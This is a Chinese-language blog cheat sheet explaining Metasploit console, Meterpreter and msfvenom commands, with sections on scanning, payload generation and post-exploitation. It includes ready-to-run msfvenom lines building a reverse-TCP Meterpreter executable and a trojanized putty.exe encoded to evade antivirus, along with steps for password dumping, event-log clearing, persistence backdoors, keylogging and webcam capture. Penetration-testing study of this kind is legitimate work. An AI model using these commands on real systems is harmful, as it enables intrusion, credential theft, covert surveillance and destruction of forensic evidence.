码迷,mamicode.com
首页 > Web开发 > 详细

metasploit常用的一些命令,来自对官方文档自己的理解

时间:2018-05-21 12:17:39      阅读:631      评论:0      收藏:0      [点我收藏+]

标签:主机名   目标   读取   jpeg   cat   targe   关键字搜索   编码   详细   

    MsfconsoleCommand

back  退出当前的模块

banner 显示一个msf的图像

check 检查当前的目标是否支持该exploits

show options 显示当前exploites的选项

connect 远程连接 ip+ port

edit 在vim中打开当前的exploits 然后进行编辑

exit 退出msfconsole环境

grep 和 linux中的grep一样,从目标中抓取flag,eg:grep http search oracle

info 显示当前exploits的详细信息

irb  进入一个Ruby的交互式shell,可以动态的交互并创建metasploit的脚本

jobs -h  对当前的工作进行操作

kill+jobid  通过job id 来终结某个job

load 从metasploit插件库中加载一些插件

loadpath 通过path来添加一些第三方的插件到metasploit中

unload 卸载

resource 通过msfconsole加载一些源代码并运行,也可以用来执行一些批量的脚本

route 添加路由功能

search  搜索一些你想知道的模块或者exploit或者

help search  查看 search的帮助

search name:通过name 来进行关键字搜索

search platform:通过平台来缩小搜索范围

search type:通过类型来缩小范围,such as auxiliary,post,exploit,etc

search author:通过你喜爱的作者来搜索

search name:  author:  platform:搜索时可以多选项缩小范围

session 会话管理 session-l 可以列个列表

session -i id 可以连接id对应的session 并且出现一个可交互的shell

set 为当前的模块哦欸之option和parameters

unset 移除自己配置的parameters

setg/unsetg 设置/移除全局变量,创建一个全局变量可以节省自己的时间

save 将当前的配置和属性保存下来

auxiliary 辅助模块(scanner,denial of service modules,fuzzers)

exploits 攻击模块,metasploit的核心,保存了各种漏洞

payloads 有效载荷

在利用模块中show targets  会显示哪些目标是受支持的

show advanced 显示高级选项

show nops 显示metasploit提供的nop生成器

 

payloads

msf payloads

 

stager 在攻击者和受害者之间建立一个通信信道,在一个阶段有效负载中读取远程主机

meterpreter   通过dll注入操作,完全驻留在内存中,不在硬盘上留下痕迹所以传统的取证难以发现

PassiveX可以帮助绕过限制的出站防火墙。它通过使用ActiveX控件创建一个隐藏的Internet Explorer实例来实现这一点。通过使用新的ActiveX控件,它通过HTTP请求和响应与攻击者进行通信。

NoNx 用来规避DEP,在某些cpu中存在DEP,防止代码在内存的某些区域运行

Reflective DLL injection 反射式DLL注入,将阶段有效载荷注入到内存中运行的主机进程中,而不触及主机硬盘。VNC和Meterpreter都使用了反射式dll注入

 

Generating Payloads

在没有任何命令的情况下生成Shellcode只需要直接使用generate,

使用generate -b ‘/x00/‘可以删除空字符,有效缩小shellcode的大小

 

Meterpreter

Using Meterpreter Commands

background 在Meterpreter 和msf之间切换

clearev  清除Windows系统中的应用信息和安全日志。无选项和参数

download 下载远程文件,在下载windows系统下的文件时,注意双斜线

edit 用vi打开文件并编辑

execute  在目的机器上打开一个命令行。execute -f cmd.exe -I -h

getuid 显示在Meterpreter服务器上运行的用户

hashdump 转储SAM数据库的数据

idletime 显示远程机器上的用户的空闲时间

lpwd 显示当前的Meterpreter的运行路径

lcd 直接在Meterpreter中切换你的工作目录,使得可以直接访问目的路径的文件

ps  显示目标机器上正在运行的进程

search 可以搜索目标机器的文件,可以搜索整个系统,也可以制定文件夹,可使用通配符

shell 提供一个目标机器上的原生的shell
upload 可以上传文件或文件夹到目标机器

webcam_list 从Meterpreter shell中运行,可以显示目标机器上的可用的网络摄像头

webcam_snap 利用当前的目标机器的可用的网络摄像头来截图成jpeg 并保存。

Execute  在目标机器中执行文件

 getwd 获取当前目标机器的工作目录,也可以获得当前系统的工作目录

download  从目标机器上下载或者文件到攻击机

route 查看路由

protfwd  meterfreter内嵌的端口转发器

ps  通过ps查看进程

migrate +pid可以将meterpreter会话从一个进程移植到另一个进程的内存空间。这样只要这个进程不结束,meterpreter会话就不会关闭。

Python_execute

下面的语句都在Meterpreter环境中

Python_execute +python语句  来实现python的使用

Python_execute “import os ;cd=os.getpwd()” -r cd 。用-r  可以实现对当前变量的打印

Python_import -f +path 用来在meterpreter中引入python文件,使用-f来指定文件

 

Port Scanning

RHOSTS可以设定ip的范围,CIDR范围和以逗号分割的多个范围以及以行分割的主机列表文件

THREADS 为扫描仪的并发线程数 默认为1,但是有具体的规则:在win32系统上时保持在16以下,在Cygwin 下要保持在200一下,类Linux系统中可以threads高于256

db_nmap 使用nmap 扫描并将扫描结果保存在database中

nmap-oA 来运行nmap 扫描 会将结果生成三个输出文件,然后用db_import来填充数据库

search portscan 来搜索msf框架中可用的portscanner 

auxiliary/scanner/smb/snb_version 可以用来探测目标机器上的操作系统版本 和主机名

auxiliary/scanner/ip/ipidseq 扫描目前网络中的空闲主机,利用该空闲主机来扫描其他主机,利用僵尸机达到自己隐身的目的

在ipidseq环境中使用nmap+参数+僵尸IP+目的ip来达到使用僵尸发起nmap扫描的目的

 

Using Metasploit to find vnlnerable mssql systems(microsoft sql server)

先使用 auxiliary/scanner/mssql/mssql_ping 设置参数后 进行发现 若发现存活的mssql服务器则可以使用auxiliary/admin/mssql/mssql_exec来进行exploit。也可以使用THC-Hydra和medusa等工具进行暴力破解

Service Identification

SSH服务发现 port(22)、FTP服务 port(21)

 

Extending Psnuffle

所有的模块都位于data/exploits/psnuffle中,名称与psnuffle使用的协议名称想对应,通常使用正则表达式

 

SNMP Sweeping

在metasploit中有SNMP辅助模块,metasploit有一个专用于清楚SNMP设备的内置辅助模块。在执行前需要修改/etc/default/snmpd中的SNMPDOPTS=‘-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1‘

127.0.0.1修改位0.0.0.0,这是因为默认只扫描本地的snmp .然后重启服务

当进行SNMP查询时,存在MIB API ,MIB 是管理信息库,该界面允许查询设备并提取信息,metasploit默认加载了数据库中的MIB列表

Search snmp 来查看可利用的snmp 扫描模块

 

Writing your own security scanner

后续 详细

 

Msfvenom

 

必要的选项 -p  和  -f 

-p指定payload  需要在后跟上参数 lhost=… lport=..等等 ,具体看options

-f指定payload的输出格式

-b会自动调用编码器

-e使用编码模块

-i 后跟迭代次数 进行多次编码,某些情况下迭代编码可以起到规避杀毒软件

Msfvenom –help-formats 查看msf支持的输出格式

Msfvenom -l payloads  列出payloads清单

Msfvenom -l encoder   列出编码方法

Msfvenom -l nops 空字段模块/为了绕过和免杀

反弹回meterpreter会话的payload:

       Msfvenom -p windows/meterpreter/reverse_tcp LOST=自己的ip LPORT=444 -f exe -o payload.exe

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/下载/putty.exe -k -f exe -o /root/桌面/putty_evil.exe

 

 

 

meterpreter在后渗透中的应用

0x01权限提升

getudid 获取当前用户id getsystem

0x02域管理员嗅探

Use  post/windows/gather/enum_domain

 

0x03抓取密码

Load minikatz

Windows/gather/hashdump

0x04日志清除

Clearev

0x05 backdoor

Metsvc

       Exploit/multi/hander

       Payload windows/metsvc_bind_tcp

Persistence 自启动安装 会留一个后门,并且添加进启动项

0x06键盘记录

Keyscan_start

Keyscan_dump

Keyscan_stop

0x07进程注入
0x08截屏

Use espia

Screen

Screenrab

metasploit常用的一些命令,来自对官方文档自己的理解

标签:主机名   目标   读取   jpeg   cat   targe   关键字搜索   编码   详细   

原文地址:https://www.cnblogs.com/poise/p/9065950.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!